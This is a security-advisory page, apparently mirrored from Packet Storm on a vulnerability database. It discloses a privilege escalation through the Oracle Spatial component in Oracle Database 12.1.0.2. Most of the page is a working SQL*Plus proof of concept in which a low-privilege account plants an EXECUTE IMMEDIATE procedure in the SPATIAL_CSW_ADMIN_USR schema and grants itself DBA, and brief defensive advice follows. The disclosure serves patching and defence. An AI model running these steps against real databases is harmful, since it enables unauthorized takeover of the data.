Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Oracle Database 12.1.0.2 Spatial Component Privilege Escalation

🗓️ 03 Feb 2023 00:00:00Reported by Emad Al-MousaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 430 Views

Oracle Database Privilege Escalation Through Oracle Spatial Component, Risk Level: High, Fixed in Oracle CPU OCT 2021, Escalation to "DBA" Role, Defensive Techniques: configure auditin

Code
`Title: Oracle Database Privilege Escalation Through Oracle Spatial Component  
Product: Database  
Manufacturer: Oracle  
Affected Version(s): 12.1.0.2  
Tested Version(s): 12cR1  
Risk Level: High  
Solution Status: Fixed in Oracle Critical Patch Update October 2021  
CVE Reference: N/A, Backported in Oracle CPU OCT 2021  
Author of Advisory: Emad Al-Mousa  
  
Overview:  
  
Privilege Escalation is a famous security vulnerability (explitation technique)..... attackers seek to compromoise IT systems for multiple objectives such as data exfiltration, cause outage,....etc.  
  
  
*****************************************  
Vulnerability Details:  
  
The following is a privilege escalation vulnerability where an attacker can escalate his/her account permissions to "DBA" role. DBA role in Oracle is a very powerfull role where the user can view & edit any data within the database, create database objects (tables,malcious code,....etc) and many other harmful activities. The vulnerability exists IF the database system has Oracle "Spatial" component is installed. This vulnerability existed in Oracle 12cR1 and backport fix was issued in October 2021.  
  
To check if Oracle Spatial Component is installed, run the following SQL query as it will list ALL installed components within the database system:  
  
SQL> select comp_name from dba_registry;  
  
  
*****************************************  
Proof of Concept (PoC):  
  
// I will create an account called ironman using SYS account, the account will be granted “create session” to connect to the database and “create any procedure”, and “execute any procedure” permissions:  
  
sqlplus / as sysdba  
  
SQL> create user ironman identified by iron_123;  
  
SQL> grant create session to ironman;  
  
SQL> grant create any procedure to ironman;  
  
  
SQL> grant execute any procedure to ironman;  
  
SQL> exit;  
  
// I will now connect using the newly created account “ironman” using sql plus  
  
sqlplus ironman/iron_123  
  
SQL> show user  
  
USER is “IRONMAN”  
  
SQL> select * from session_roles;  
  
no rows selected  
  
SQL> create or replace procedure SPATIAL_CSW_ADMIN_USR.hulk (SQL_TEXT IN VARCHAR2) as  
  
BEGIN  
  
EXECUTE IMMEDIATE (SQL_TEXT);  
  
END hulk;  
/  
  
  
SQL> execute SPATIAL_CSW_ADMIN_USR.hulk('grant DATAPUMP_IMP_FULL_DATABASE to ironman');  
  
  
SQL> select * from session_roles;  
  
no rows selected  
  
SQL> set role DATAPUMP_IMP_FULL_DATABASE;  
  
// ironman account is escalated to the role DATAPUMP_IMP_FULL_DATABASE  
  
SQL> select * from session_roles;  
  
ROLE  
  
——————————————————————————–  
  
DATAPUMP_IMP_FULL_DATABASE  
  
EXP_FULL_DATABASE  
  
SELECT_CATALOG_ROLE  
  
HS_ADMIN_SELECT_ROLE  
  
HS_ADMIN_ROLE  
  
HS_ADMIN_EXECUTE_ROLE  
  
EXECUTE_CATALOG_ROLE  
  
IMP_FULL_DATABASE  
  
8 rows selected.  
  
// the next escalation level is to DBA role !!  
  
SQL> grant dba to ironman;  
  
SQL> set role dba;  
  
SQL> select * from session_roles;  
  
ROLE  
  
——————————————————————————–  
  
DBA  
  
SELECT_CATALOG_ROLE  
  
HS_ADMIN_SELECT_ROLE  
  
HS_ADMIN_ROLE  
  
HS_ADMIN_EXECUTE_ROLE  
  
EXECUTE_CATALOG_ROLE  
  
DELETE_CATALOG_ROLE  
  
EXP_FULL_DATABASE  
  
Advertisements  
Report this ad  
  
IMP_FULL_DATABASE  
  
DATAPUMP_EXP_FULL_DATABASE  
  
DATAPUMP_IMP_FULL_DATABASE  
  
ROLE  
  
——————————————————————————–  
  
GATHER_SYSTEM_STATISTICS  
  
SCHEDULER_ADMIN  
  
XDBADMIN  
  
XDB_SET_INVOKER  
  
JAVA_ADMIN  
  
JAVA_DEPLOY  
  
WM_ADMIN_ROLE  
  
CAPTURE_ADMIN  
  
OPTIMIZER_PROCESSING_RATE  
  
EM_EXPRESS_ALL  
  
EM_EXPRESS_BASIC  
  
22 rows selected.  
  
--- Conclusion:  
  
The account ironman has been successfully elevated to the “DBA” role which is the highest database role in Oracle database system.  
  
  
*****************************************  
- Defensive Techniques:  
  
configure auditing to catch any privilege escalation attempts.  
review database account permissions on regular basis.  
ensure database accounts have strong passwords, and rotate passwords regularly if possible.  
perform VA (vulnerability assesment) scans on regular basis.  
pro-actively patch your systems and database systems.  
  
  
*****************************************  
References:  
https://www.oracle.com/security-alerts/cpuoct2021.html  
https://databasesecurityninja.wordpress.com/2021/10/22/oracle-database-privilege-escalation-through-oracle-spatial-component/comment-page-1/  
  
Credit:   
Security-In-Depth Contributors: Emad Al-Mousa  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Feb 2023 00:00Current
1.3Low risk
Vulners AI Score1.3
oracledatabaseprivilege escalationoracle spatial componenthigh riskfixedoctober 2021dba rolesecurity vulnerabilityauditing
430